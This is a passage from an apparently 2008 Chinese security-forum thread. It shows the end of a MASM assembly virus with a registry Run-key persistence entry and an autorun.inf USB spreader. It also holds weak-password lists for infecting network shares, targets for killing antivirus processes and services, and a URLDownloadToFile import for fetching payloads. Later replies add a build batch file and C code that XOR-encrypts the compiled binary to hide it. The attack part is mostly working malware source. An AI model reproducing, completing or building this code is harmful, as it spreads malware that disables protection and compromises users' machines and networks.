szFreeLibrary db "FreeLibrary",0 _FreeLibrary dd 0 szVirtualProtect db "VirtualProtect",0 _VirtualProtect dd 0 szGetModuleFileName db "GetModuleFileNameA",0 _GetModuleFileName dd 0 szCreateFile db "CreateFileA",0 _CreateFile dd 0 szReadFile db "ReadFile",0 _ReadFile dd 0 szWriteFile db "WriteFile",0 _WriteFile dd 0 szGetFileSize db "GetFileSize",0 _GetFileSize dd 0 szCloseHandle db "CloseHandle",0 _CloseHandle dd 0 szCreateRemoteThread db "CreateRemoteThread",0 _CreateRemoteThread dd 0 szVirtualAllocEx db "VirtualAllocEx",0 _VirtualAllocEx dd 0 szVirtualFree db "VirtualFree",0 _VirtualFree dd 0 szWriteProcessMemory db "WriteProcessMemory",0 _WriteProcessMemory dd 0 szOpenProcess db "OpenProcess",0 _OpenProcess dd 0 szCreateProcess db "CreateProcess",0 _CreateProcess dd 0 szTerminateProcess db "TerminateProcess",0 _TerminateProcess dd 0 szCreateThread db "CreateThread",0 _CreateThread dd 0 szSleep db "Sleep",0 _Sleep dd 0 szCreatePipe db "CreatePipe",0 _CreatePipe dd 0 szGlobalAlloc db "GlobalAlloc",0 _GlobalAlloc dd 0 szGlobalFree db "GlobalFree",0 _GlobalFree dd 0 szSetFilePointer db "SetFilePointer",0 _SetFilePointer dd 0 szFindFirstFile db "FindFirstFileA",0 _FindFirstFile dd 0 szFindNextFile db "FindNextFileA",0 _FindNextFile dd 0 szFindClose db "FindClose",0 _FindClose dd 0 szWinExec db "WinExec",0 _WinExec dd 0 szGetSystemDirectory db "GetSystemDirectoryA", 0 _GetSystemDirectory dd 0 szGetDriveType db "GetDriveTypeA",0 _GetDriveType dd 0 szSetFileTime db "SetFileTime",0 _SetFileTime dd 0 szSetFileAttributes db "SetFileAttributesA",0 _SetFileAttributes dd 0 szGetFileAttributesEx db "GetFileAttributesExA",0 _GetFileAttributesEx dd 0 szDeleteFile db "DeleteFileA",0 _DeleteFile dd 0 szGetLastError db "GetLastError",0 _GetLastError dd 0 ;---------------Ntdll fun address------------------ szNtdll db "Ntdll.dll",0 szNtQuerySystemInformation db "NtQuerySystemInformation",0 _NtQuerySystemInformation dd 0 ;--------------user32.dll fun address-------------------- szUser32 db "user32.dll",0 szFindWindowEx db "FindWindowExA",0 _FindWindowEx dd 0 ;-------------Mpr.dll fun address----------------------- szMpr db "Mpr.dll",0 szWNetOpenEnum db "WNetOpenEnumA",0 _WNetOpenEnum dd 0 szWNetEnumResource db "WNetEnumResourceA",0 _WNetEnumResource dd 0 szWNetAddConnection2 db "WNetAddConnection2A",0 _WNetAddConnection2 dd 0 szWNetCloseEnum db "WNetCloseEnum",0 _WNetCloseEnum dd 0 ;-------------Advapi32.dll fun address------------- szAdvapi32 db "Advapi32.dll",0 szOpenSCManager db "OpenSCManagerA",0 _OpenSCManager dd 0 szOpenService db "OpenServiceA",0 _OpenService dd 0 szControlService db "ControlService",0 _ControlService dd 0 szCloseServiceHandle db "CloseServiceHandle",0 _CloseServiceHandle dd 0 szRegOpenKeyEx db "RegOpenKeyExA",0 _RegOpenKeyEx dd 0 szRegSetValueEx db "RegSetValueExA",0 _RegSetValueEx dd 0 szRegCloseKey db "RegCloseKey",0 _RegCloseKey dd 0 ;------------------urlmon.dll fun address-------------- szurlmon db "urlmon.dll",0 szURLDownloadToFile db "URLDownloadToFileA",0 _URLDownloadToFile dd 0 ;--------------------------------------------------- _runKeyName db "vApp",0 _runKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0 _autoruncontent db "[autorun]",0dh,0ah,"open=" virname db "sopl.scr",0 virdll db "sopl.dll",0 _autorun db "autorun.inf",0 runPosition db 0 _website db "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" _website_end db 0 _killSoftName db "taskmgr.exe",0 db "VPTray.exe",0 db 0 _tryUserName db "admin",0 db "guest",0 db 0 _tryPassword db "123456",0 db "admin",0 db "guest",0 db 0 _downFileList db "www.sina.com.cn",0 db "www.sohu.com",0 db "www.163.com",0 db 0 _StopServiceName db "Symantec AntiVirus",0 db "SavRoam",0 db 0 ;------------------remove begin----------------- szmm db "MessageBoxA",0 _mm dd 0 ;------------------remove end-------------------- tempword db 'czj1' ournasdfasdf: PROGRAM_END: push 0 push 0 call GetProcAddress push 0 call LoadLibraryA ;--ournasdfasdf: END main 2008-2-2 12:54 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 55 关注私信	combojiang 26 17 楼楼上给出的代码有问题啊 2008-2-2 13:13 0
cqblack 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	cqblack 18 楼有什么问题？下面是编译的批处理 @echo off del vir.exe SET PROJECTNAME=vir SET MASMBINPATH=d:\MASM32\BIN %MASMBINPATH%\Ml.exe /c /coff /Zp1 %PROJECTNAME%.asm %MASMBINPATH%\Link.exe /SUBSYSTEM:WINDOWS /MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078 /ALIGN:128 %PROJECTNAME%.obj echo. pause cpp1.exe 2008-2-9 13:27 0
cqblack 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	cqblack 19 楼把指令 int 3 全部注解。 2008-2-9 13:30 0
cqblack 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	cqblack 20 楼编译的后要对编出来的EXE 加一次密。代码如下。因为编出来的EXE执行时，首先要解密一次。就是那个make.bat 最后的那个cpp1.exe #include <io.h> #include <fcntl.h> #include <stdio.h> int main() { int fp = _open("f:\\vir\\vir.exe", O_RDWR \| _O_BINARY ); int len = _lseek(fp, 0x2c1 , 0); unsigned long value; char buf[0x10000]; len = _read(fp, buf, 0x10000); int i = 0; for (i = 0; i < len; i+=4) { unsigned long p = (unsigned long)(buf + i); *p ^= 'czj1'; } _lseek(fp, 0x2c1 , 0); _write(fp, buf, i); _close(fp); printf("0x%x, 0x%x", len , len & ~0x3); getchar(); return 0; } 2008-2-9 14:09 0
linyboy 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 18 粉丝 0 关注私信	linyboy 21 楼 combojiang用Ori_Entry[ebp]定址真精炼！ 2008-2-9 14:27 0
nosber 雪币： 200 活跃值： (17) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	nosber 22 楼不错~~收藏~~ 2008-2-12 13:08 0
dylin 雪币： 200 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	dylin 23 楼支持一下!! 2008-3-2 22:56 0
gaooliang 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	gaooliang 24 楼不明白呵呵还是要学习啊 2008-3-6 13:54 0
neuqyl 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 4 粉丝 0 关注私信	neuqyl 25 楼学习了 ~~~~~ 2008-3-8 09:46 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复